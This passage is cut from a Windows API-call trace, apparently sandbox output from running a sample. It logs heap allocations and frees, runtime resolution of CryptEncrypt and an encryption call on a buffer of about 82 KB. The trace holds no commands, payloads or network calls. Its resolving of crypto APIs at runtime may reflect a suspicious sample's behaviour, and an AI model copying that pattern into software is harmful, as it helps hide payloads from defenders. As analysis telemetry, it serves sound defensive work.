hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0200.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0200.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0200.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2e94560 [0200.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94560 | out: hHeap=0x970000) returned 1 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0200.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0200.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0200.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.520] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0200.521] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14227, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14228) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0200.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0200.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.525] CharLowerBuffW (in: lpsz="byte[82472]", cchLength=0xb | out: lpsz="byte[82472]") returned 0xb [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0200.525] RtlAllocateHeap 